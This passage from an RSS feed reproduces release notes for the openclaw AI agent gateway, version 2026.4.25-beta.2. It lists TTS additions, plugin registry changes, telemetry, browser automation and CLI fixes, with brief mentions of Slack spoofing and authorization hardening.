<li>Agents/CLI sessions: bind <code>google-gemini-cli</code> session auth-epoch to the Google account identity in <code>~/.gemini/oauth_creds.json</code>, so Gemini-backed agents resume their conversation after gateway restart instead of minting a fresh session, and stale bindings are invalidated when the authenticated Google account changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321086277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70973/hovercard" href="https://github.com/openclaw/openclaw/issues/70973">#70973</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322606915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71076" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71076/hovercard" href="https://github.com/openclaw/openclaw/pull/71076">#71076</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Slack: stop treating user mentions in assistant-authored message edit blocks as sender attribution, preventing edited bot messages from spoofing a mentioned DM user. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328906494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71700/hovercard" href="https://github.com/openclaw/openclaw/pull/71700">#71700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: consume unauthorized bound conversation inbound claims before they can fall through to other claim handlers or enqueue Codex turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71702/hovercard" href="https://github.com/openclaw/openclaw/pull/71702">#71702</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex media understanding: require approval-checked app-server image turns while explicitly declining tool, file, permission, and elicitation approval requests for the bounded image worker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71703/hovercard" href="https://github.com/openclaw/openclaw/pull/71703">#71703</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Claude CLI: allow large live <code>stream-json</code> JSONL lines up to the existing per-turn raw limit, preventing large Telegram, WebChat, MCP, and image turns from aborting on the old stdout buffer cap. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329383401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71793/hovercard" href="https://github.com/openclaw/openclaw/issues/71793">#71793</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322675128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71080/hovercard" href="https://github.com/openclaw/openclaw/issues/71080">#71080</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318647707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70766/hovercard" href="https://github.com/openclaw/openclaw/issues/70766">#70766</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329830196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71897/hovercard" href="https://github.com/openclaw/openclaw/pull/71897">#71897</a>) Thanks @chacher86, @shivamgrover21, and @tpjordan.</li>
<li>Agents/Claude CLI: unwrap nested Claude result envelopes in CLI JSON output so delegated agent responses surface as final text instead of raw result JSON. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264813860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66819/hovercard" href="https://github.com/openclaw/openclaw/pull/66819">#66819</a>) Thanks @mraleko.</li>
<li>Agents/Claude CLI: apply the configured 1M context window override to eligible Claude CLI Opus and Sonnet models when <code>context1m</code> is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319842892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70863/hovercard" href="https://github.com/openclaw/openclaw/pull/70863">#70863</a>) Thanks @bidadh.</li>
<li>Models/status: report fresh Claude CLI native auth instead of stale stored <code>anthropic:claude-cli</code> profile expiry when local credentials are current. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325517974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71256/hovercard" href="https://github.com/openclaw/openclaw/issues/71256">#71256</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326550173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71332/hovercard" href="https://github.com/openclaw/openclaw/pull/71332">#71332</a>) Thanks @matthiasjanke and @neeravmakwana.</li>
<li>CLI backends: compact OpenClaw transcripts after over-budget CLI turns and reseed fresh CLI sessions from the compacted transcript instead of stale external resume state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285899710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68329/hovercard" href="https://github.com/openclaw/openclaw/issues/68329">#68329</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329888680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71916" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71916/hovercard" href="https://github.com/openclaw/openclaw/pull/71916">#71916</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: keep default tool progress messages visible when answer preview streaming is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329509796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71825/hovercard" href="https://github.com/openclaw/openclaw/pull/71825">#71825</a>) Thanks @VACInc.</li>
<li>Configure/models: clear deselected model fallbacks when updating the model picker allowlist, including provider-scoped setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328198274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71596" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71596/hovercard" href="https://github.com/openclaw/openclaw/pull/71596">#71596</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Agents/streaming: strip namespaced <code>&lt;antml:thinking&gt;</code> reasoning tags from streamed assistant replies before user-visible text is emitted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294779031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69288/hovercard" href="https://github.com/openclaw/openclaw/pull/69288">#69288</a>) Thanks @xialonglee.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.25-beta.2]]></title>
<description><![CDATA[2026.4.25
Highlights

Voice replies get a full TTS upgrade: /tts latest, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, ...]]></description>
<link>https://tsecurity.de/de/3465731/downloads/openclaw-2026425-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465731/downloads/openclaw-2026425-beta2/</guid>
<pubDate>Sun, 26 Apr 2026 14:30:49 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.25</h2>
<h3>Highlights</h3>
<ul>
<li>Voice replies get a full TTS upgrade: <code>/tts latest</code>, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discovery, and install metadata more deterministic. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenTelemetry coverage expands across model calls, token usage, tool loops, harness runs, exec processes, outbound delivery, context assembly, and memory pressure with bounded low-cardinality attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Browser automation gets safer tab URLs, iframe-aware role snapshots, CDP readiness tuning, headless one-shot launch, and deeper browser doctor probes for slow hosts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Control UI and setup flows add PWA/Web Push support, Crestodian first-run repair, TUI setup, context mode selection, and a shorter startup greeting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Install/update hardening covers Windows, macOS, Linux, Docker, bundled plugin runtime deps, Node service restarts, LaunchAgent token rotation, and mixed-version gateway verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>TTS/WhatsApp: add <code>/tts latest</code> read-aloud support with duplicate suppression and <code>/tts chat on|off|default</code> session-scoped auto-TTS overrides, completing the on-demand voice-note UX for current-chat replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256179902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66032/hovercard" href="https://github.com/openclaw/openclaw/issues/66032">#66032</a>.</li>
<li>TTS/channels: resolve channel and account TTS overrides generically, enabling Feishu and QQBot accounts to deep-merge <code>channels.&lt;channel&gt;.accounts.&lt;id&gt;.tts</code> over global and per-agent TTS config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>TTS/agents: allow <code>agents.list[].tts</code> to override global <code>messages.tts</code> for per-agent voices, and make <code>/tts audio</code>, <code>/tts status</code>, and the <code>tts</code> agent tool honor the active voice/provider override while keeping shared provider credentials and preferences in the existing TTS config surface.</li>
<li>Providers/Azure Speech: add Azure Speech as a bundled TTS provider with Speech-resource auth, voice listing, SSML escaping, native Ogg/Opus voice-note output, and telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113089889" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51776/hovercard" href="https://github.com/openclaw/openclaw/pull/51776">#51776</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>.</li>
<li>Google Meet: add calendar-backed attendance export workflows, export manifests, dry-run previews, and tool parity for meeting records.</li>
<li>Control UI: add PWA install support and Web Push notifications for Gateway chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068543152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44590/hovercard" href="https://github.com/openclaw/openclaw/pull/44590">#44590</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>.</li>
<li>Browser automation: add safe tab URLs in agent responses plus a CDP-native role snapshot fallback with iframe-aware refs, cursor-clickable detection, target attach preparation, and <code>openclaw browser doctor --deep</code> live snapshot probing.</li>
<li>CLI/image generation: expose generic <code>--background</code> on <code>openclaw infer image generate</code> and <code>openclaw infer image edit</code>, keep <code>--openai-background</code> as an OpenAI alias, and let fal image generation honor <code>--output-format png|jpeg</code>.</li>
<li>Browser/config: allow local managed Chrome launch discovery and post-launch CDP readiness timeouts to be raised for slower hosts such as Raspberry Pi. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264662087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66803/hovercard" href="https://github.com/openclaw/openclaw/issues/66803">#66803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a>.</li>
<li>Discord: allow <code>channels.discord.voice.model</code> to override the LLM used for voice channel responses while keeping STT and TTS on their existing media settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240023484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64368/hovercard" href="https://github.com/openclaw/openclaw/pull/64368">#64368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrdavey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrdavey">@mrdavey</a>.</li>
<li>Browser/CLI: add <code>openclaw browser start --headless</code> as a one-shot local managed browser launch override without rewriting persisted browser config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>CLI/Crestodian/TUI: add the first-run setup helper, local planner fallback, full-TUI interactive Crestodian, startup progress indicators, context mode selector, and a shorter startup greeting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329002099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71720/hovercard" href="https://github.com/openclaw/openclaw/pull/71720">#71720</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329176612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71760/hovercard" href="https://github.com/openclaw/openclaw/pull/71760">#71760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Plugins: migrate the local plugin registry automatically during package install/update, keeping install metadata in the plugin index while indexing existing plugin manifests for the new cold registry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: make <code>openclaw doctor --fix</code> refresh the plugin index and cold registry index when needed without treating plugin install records as authored config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/hooks: add before-agent-finalize hooks, cron <code>jobId</code> hook context, bounded native permission fingerprints, and Codex MCP hook relay support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329196089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71765/hovercard" href="https://github.com/openclaw/openclaw/pull/71765">#71765</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329172189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71758/hovercard" href="https://github.com/openclaw/openclaw/pull/71758">#71758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328919273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71707/hovercard" href="https://github.com/openclaw/openclaw/pull/71707">#71707</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.6.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: align model-call GenAI span attributes with OpenTelemetry stability opt-in semantics, keeping legacy <code>gen_ai.system</code> by default while emitting <code>gen_ai.provider.name</code> under <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: support signal-specific OTLP endpoint overrides for traces, metrics, and logs via config or standard OTEL environment variables. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded telemetry exporter health diagnostics for startup and log-export failures without exporting raw error text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export agent harness lifecycle telemetry as bounded <code>openclaw.harness.run</code> spans and <code>openclaw.harness.duration_ms</code> metrics so QA-lab, Codex, and future harnesses share one trace shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/trace: propagate W3C <code>traceparent</code> headers from trusted model-call trace context to provider transports while replacing caller-supplied traceparent values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/Prometheus: add a bundled <code>diagnostics-prometheus</code> plugin with a protected gateway scrape route for low-cardinality diagnostics metrics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: add <code>openclaw plugins registry</code> for explicit persisted-registry inspection and <code>--refresh</code> repair without making normal startup rescan plugin locations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make <code>openclaw plugins list</code> read the cold persisted registry snapshot by default, leaving module-aware diagnostics to <code>plugins doctor</code> and <code>plugins inspect</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: move gateway startup plugin planning onto the versioned cold registry index, with postinstall repair for older registry files that predate startup metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: normalize startup and provider plugin enablement through registry aliases so boot paths do not need the legacy manifest alias scan. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: resolve provider ownership, provider discovery scopes, and catalog-hook provider ids from the cold plugin registry instead of rescanning manifests on those paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: keep installed plugin index records focused on install/state/load paths and resolve plugin capabilities from manifests scoped to indexed plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: route cold manifest and capability lookups through the installed plugin index so setup, channels, config, secrets, doctor, and provider metadata paths avoid broad plugin-root scans before runtime execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: speed up <code>models list --all --provider &lt;id&gt;</code> for static manifest-backed providers by loading catalog rows through the installed plugin index instead of broad manifest scans or runtime suppression hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: use OpenClaw Provider Index preview rows as the final cold fallback for installable providers, while keeping user config, installed manifests, and refreshed cache rows above provider-index metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
